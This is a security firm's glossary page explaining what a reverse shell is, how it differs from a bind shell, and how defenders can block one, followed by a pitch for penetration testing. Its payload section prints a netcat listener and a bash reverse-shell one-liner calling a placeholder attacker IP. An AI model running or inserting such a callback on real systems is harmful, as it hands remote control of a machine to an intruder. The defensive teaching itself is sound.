Lateral Movement · Term

What is a reverse shell?

A reverse shell makes the compromised machine connect back to the attacker, handing over a command shell. It is the most common way attackers get interactive access through firewalls. Here is what it is and how it works.

Lateral Movement · TermAll services
TL;DR

A reverse shell is a shell session where the compromised machine connects out to the attacker and gives them command-line control, rather than the attacker connecting in. It is popular because outbound connections usually pass through firewalls that block inbound ones. The attacker runs a listener and triggers a small command on the target that calls back. It contrasts with a bind shell, where the target listens and the attacker connects in.

By John Dill, Red Team Lead, SecureLayer7Updated

What a reverse shell is

When an attacker runs code on a target, they want an interactive shell. There are two directions:

  • A bind shell opens a listening port on the target and waits for the attacker to connect in.
  • A reverse shell makes the target connect out to the attacker, who is already listening, and pipes a shell over that connection.

Reverse shells dominate because firewalls and NAT usually allow outbound traffic while blocking inbound, so the callback succeeds where an inbound connection would be blocked.

How it works and payload

The attacker starts a listener, then triggers the callback on the target:

  • Listener (attacker): nc -lvnp 443
  • Linux target callback: bash -i >& /dev/tcp/ATTACKER-IP/443 0>&1
  • Alternatives: python3 -c 'import socket,subprocess,os;...', or a nc / mkfifo one-liner.
  • Windows target: a PowerShell TCP client that pipes a shell back to the listener.

Once the callback lands, the attacker has an interactive shell on the target. Documented techniques shown for defenders.

How to defend

  • Restrict egress (outbound) traffic with a firewall so hosts cannot freely connect to arbitrary internet addresses and ports.
  • Use application allow-listing to stop unexpected interpreters and tools from running.
  • Monitor for unusual outbound connections, especially shells spawned by web or service processes.
  • Segment so a host that does get a reverse shell cannot reach much else (limits pivoting).
  • Patch and harden the entry points that let an attacker run the initial command.

References

  1. [1]MITRE ATT&CK: Lateral Movement (TA0008)(MITRE)
  2. [2]NIST SP 800-115 Technical Guide to Security Testing(NIST)
  3. [3]Linux man-pages: ssh(1)(man7.org)
Related terms

Common questions

Lateral movement, asked often

Want your network tested for these paths?

Scope an engagement

Find the lateral-movement paths before an attacker does.

We run internal and network penetration tests that follow the real route from one compromised host across your network, then hand your team a report with reproducible evidence and a fix for every step. Free re-test included.

See all services30-min scoping call, fixed-price proposal in 48 hours.